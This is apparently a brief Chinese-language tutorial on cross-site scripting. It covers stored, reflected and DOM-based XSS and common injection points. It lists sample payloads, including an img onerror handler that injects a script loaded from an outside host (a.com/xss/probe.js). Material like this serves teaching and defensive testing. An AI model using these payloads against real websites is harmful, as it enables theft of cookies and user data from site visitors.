XSS跨站脚本攻击
1.简介
XSS(Cross Site Scripting)跨站脚本攻击是利用系统对恶意用户的输入影响其他用户HTML的过滤不足,导致执行恶意用户的的代码.从而盗取用户cookie,用户资料等威胁.
2.整体框架
2.1XSS的发现与利用
2.1.1原理:网站未对用户的输入进行过滤
2.1.2常见场景:
有回复框的地方都可能存在xss
2.1.3XSS分类:
①存储型:
在所有类型的xss中存储型的危害是最大的,它存储在服务器当中,每次用户访问当前页面都会执行此xss.他可以被管理员看见,并且还可以提交内容.
②反射型
具体表现在我们把我们的恶意脚本通过url的方式传递给了服务器,而服务器则只是不加处理的把脚本“反射”回访问者的浏览器而使访问者的浏览器执行相应的脚本。也就是说想要触发漏洞,需要访问特定的链接才能够实现。
③DOM型
DOM—based XSS漏洞是基于文档对象模型Document Objeet Model,DOM)的一种漏洞。DOM是一个与平台、编程语言无关的接口,它允许程序或脚本动态地访问和更新文档内容、结构和样式,处理后的结果能够成为显示页面的一部分。DOM中有很多对象,其中一些是用户可以操纵的,如uRI,location,refelTer等。客户端的脚本程序可以通过DOM动态地检查和修改页面内容,它不依赖于提交数据到服务器端,而从客户端获得DOM中的数据在本地执行,如果DOM中的数据没有经过严格确认,就会产生DOM—based XSS漏洞。
2.1.4XSS常见playload:
<script>alert(1)</script>
<img src="http://abc/xss/a.js">
<img src=x onerror="s=createElement('script');body.appendChild(s);s.src='http://a.com/xss/probe.js' ";>
2.1.5XSS注入点:
在标签内<div>xss test</div>
在属性内:<input type="text" name="content" value="xss test" />
可以输入“x>xss test ”来进行测试